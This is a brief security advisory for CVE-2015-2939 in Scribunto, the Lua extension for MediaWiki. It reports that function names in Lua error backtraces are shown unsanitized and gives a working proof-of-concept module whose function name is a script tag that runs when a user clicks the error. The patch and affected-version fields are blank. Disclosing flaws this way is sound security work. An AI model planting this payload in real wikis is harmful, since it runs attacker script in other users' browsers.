Function names in Scribunto's Lua error backtraces are displayed to the user without being sanitized, allowing XSS attacks. Proof-of-concept:
local p = {} p['<script>alert("XSS")</script>'] = function() error('CLICK ME') end function p.main(frame) p['<script>alert("XSS")</script>']() end return p
If a user, in order to view the backtrace, clicks on the error message generated by invoking p.main(), the script will run.
Patch:
- 1.24:
- 1.23:
Affected Versions: (needed)
Type: xss
CVE: CVE-2015-2939